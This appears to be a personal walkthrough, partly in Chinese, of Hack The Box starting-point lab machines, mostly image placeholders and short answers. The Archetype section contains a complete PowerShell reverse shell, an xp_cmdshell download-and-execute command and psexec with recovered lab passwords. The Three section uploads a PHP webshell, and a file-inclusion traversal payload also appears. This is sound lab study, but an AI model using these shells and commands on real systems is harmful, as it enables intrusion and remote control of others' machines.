Meow

image-20230206175627606

image-20230206174536717

image-20230206174546679

Virtual Machine

image-20230206175818020

Terminal

image-20230206181027449

openvpn

image-20230206181038820

tun

image-20230206181101333

ping

image-20230206181110680

nmap

image-20230206181201614

image-20230206181150222

telnet

image-20230206181236646

root

image-20230206181448142

image-20230206181408513

image-20230206181427180

Fawn

image-20230206184145534

File Transfer Protocol

image-20230206184254486

21

image-20230206185045555

sftp

image-20230206185201079

ping

image-20230206191033877

nmap 10.129.119.29 -p 21 -sV

image-20230206190731487

vsftpd 3.0.3

image-20230206191953692

unix

image-20230206192032593

ftp -H

image-20230206192150303

anonymous

image-20230206193037257

image-20230206193005172

230

image-20230206193259107

image-20230206193245833

ls

image-20230206193359569

image-20230206193347668

get

image-20230206193434105

image-20230206193417839

Dancing

image-20230206233828580

server message block

image-20230206233853521

445

image-20230206234005320

nmap 10.129.44.223 -p 445

image-20230206234111336

image-20230207015202299

image-20230207015214960

-L

image-20230207020741444

4

image-20230207020842867

workshares

image-20230207021442054

get

image-20230207022035324

image-20230207022104548

Redeemer

image-20230207181240757

nmap -sS  10.129.100.239 --top-ports 5000

image-20230207180914811

6379

image-20230207181413876

redis

image-20230207181447973

In-memory Database

image-20230207182137423

redis-cli

image-20230207182226640

-h

image-20230207182605126

image-20230207182550642

info

image-20230207182628928

5.0.7

image-20230207185114681

select

image-20230207185506925

image-20230207185449819

4

image-20230207190315731

keys *

image-20230207190320437

image-20230207190305239

Appointment

image-20230207193324797

Structured Query Language

image-20230207193556217

sql injection

image-20230207194117621

Personally Identifiable Information

image-20230207194644252

A03:2021-Injection

image-20230207195521269

image-20230207195454695

Apache httpd 2.4.38 ((Debian))

image-20230207195535458

443

image-20230207195741269

directory

image-20230207195929370

404

image-20230207200046085

dir

image-20230207200057263

#

image-20230207202904323

image-20230207201808751

image-20230207201817903

Congratulations

Sequel

image-20230207203150343

3306

image-20230207232927990

image-20230207232940220

MariaDB

image-20230207232957117

-u

image-20230207233009889

root

image-20230207233025993

*

image-20230207233857026

;

image-20230207234145269

image-20230207234128565

htb

image-20230207234759316

Crocodile

image-20230209124206871

-sC

image-20230209124317883

image-20230209124257748

vsFTPd 3.0.3

image-20230209124538707

image-20230209124521104

230

image-20230209124604080

anonymous

image-20230209124611319

get

image-20230209124711612

image-20230209124645632

image-20230209124701469

admin

image-20230209125350976

image-20230209125338265

Apache httpd 2.4.41

image-20230209131836191

-X

image-20230209132208017

login.php

密码在ftp服务

image-20230209132759510

image-20230209132829559

image-20230209132845125

Responder

image-20230209135731889

image-20230209135659603

unika.htb

hosts 文件中添加

image-20230209140144798

image-20230209140212966

image-20230209140426979

image-20230209140454616

php

image-20230209140511056

page

image-20230209140613675

../../../../../../../../windows/system32/drivers/etc/hosts

image-20230209140642669

//10.10.14.6/somefile

image-20230209145146047

New Technology

image-20230209172519832

image-20230209172500168

-I

image-20230209173625814

John the Ripper

image-20230209174709960

image-20230209174723015

image-20230209174728947

image-20230209174804175

image-20230209174754995

image-20230209175231311

image-20230209175617496

可以看到密码是badminton

image-20230209180705343

image-20230209192115528

image-20230209191750240

image-20230209192105901

5985

image-20230209193313661

Three

image-20230209200522621

image-20230209195405065

2

image-20230209200717038

image-20230209200700738

thetoppers.htb

image-20230209201410743

/etc/hosts

image-20230209203214804

image-20230210173244081

高版本需要这样才能扫到 

gobuster vhost -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u http://thetoppers.htb --append-domain

image-20230212165028171

image-20230210174102491

image-20230210174113567

s3.thetoppers.htb

image-20230210173431041

image-20230210173346595

amazon s3

image-20230211191615347

image-20230211191602197

awscli

image-20230212130426043

image-20230212130451552

aws configure

image-20230212131117703

列出存储桶

aws --endpoint=http://s3.thetoppers.htb s3 ls

image-20230212162718750

aws s3 ls

image-20230212162739643

列出存储桶中的文件

aws  --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

image-20230212162703431

php
aws  --endpoint=http://s3.thetoppers.htb s3 cp zf.php s3://thetoppers.htb

image-20230212162956915

写一个一句话木马上传

image-20230212163703965

image-20230212163819371

Archetype

image-20230212191516755

image-20230212191508618

1433

image-20230212191659660

image-20230212191645776

backups

image-20230212191917202

image-20230212191851406

image-20230212191900954

prod.dtsConfig 是一个mssql配置文件

M3g4c0rp123

image-20230212193146753

image-20230212193001823

mssqlclient.py

image-20230212193221613

select is_srvrolemember ('sysadmin')  //查看有无sysadmin 权限
enable_xp_cmdshell

image-20230212194003861

EXEC sp_configure 'Show Advanced Options', 1;		
\\使用sp_configure系统存储过程,设置服务器配置选项,将Show Advanced Options设置为1时,允许修改数据库的高级配置选项
reconfigure;											
\\确认上面的操作
sp_configure;											
\\查看当前sp_configure配置情况
EXEC sp_configure 'xp_cmdshell', 1						
\\使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令
reconfigure;										
\\确认上面的操作
xp_cmdshell "whoami" 								
\\在靶机上调用cmdshell执行whoami
xp_cmdshell

image-20230212194412756

尝试powershell 反弹shell

vim zf.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.128",5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
python3 -m http.server

image-20230212194536622

image-20230212194626836

xp_cmdshell powershell iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.128/zf.ps1'');

image-20230212195233800

image-20230212195325051

3e7b102e78218e935bf3f4951fec21a3

image-20230212195507795

WinPEAS

image-20230212200956446

https://github.com/carlospolop/PEASS-ng/releases

image-20230212195813224

wget http://10.10.14.128/winPEASany.exe -o winpeas.exe

image-20230212200153424

./winpeas.exe log=result.txttype

image-20230212200639041

image-20230212200906099

这里找到 admin 密码

image-20230212200914259

ConsoleHost_history.txt
impacket-psexec administrator@10.129.71.45
MEGACORP_4dm1n!!

image-20230212202055369

image-20230212202248476